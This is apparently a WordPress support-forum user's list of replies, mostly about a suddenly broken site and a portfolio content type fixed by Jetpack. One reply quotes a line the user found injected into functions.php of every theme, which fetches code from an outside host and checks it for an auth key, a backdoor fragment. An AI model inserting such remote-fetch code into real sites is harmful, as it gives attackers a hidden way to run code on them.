ecce
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: WordPress suddenly brokeThe hosting company restored a backup of my server from the day before this happened. It still didn’t work. I commented out the block of code breaking the page and VOILA, it’s up again. The if statement is on line 111 in functions.php in every theme:
if (($tmpcontent = @file_get_contents(“http://www.wacocs.com/code.php”) OR $tmpcontent = @file_get_contents_tcurl(“http://www.wacocs.com/code.php”)) AND stripos($tmpcontent, $wp_auth_key) !== false) {
I feel like I’ve been hacked.
Forum: Fixing WordPress
In reply to: WordPress suddenly brokeI have tried that, see link in my first post. It does not give me anything, it does not even create the debug file.
Forum: Fixing WordPress
In reply to: WordPress suddenly brokeI get nothing in the access log nor in the error log. I have verified that I’m looking the right files by reconfiguring the apache config to “Required all denied” that triggered a new log entry in the access log. By calling the error_log() function in a php file i got a message in the error log.
Forum: Fixing WordPress
In reply to: Portfolio Custom Content type?Nice! Jetpack fixed it!
Thanks!
Forum: Fixing WordPress
In reply to: Portfolio Custom Content type?So what is the solution? Can the portfolio content type be installed, or should I look for another theme?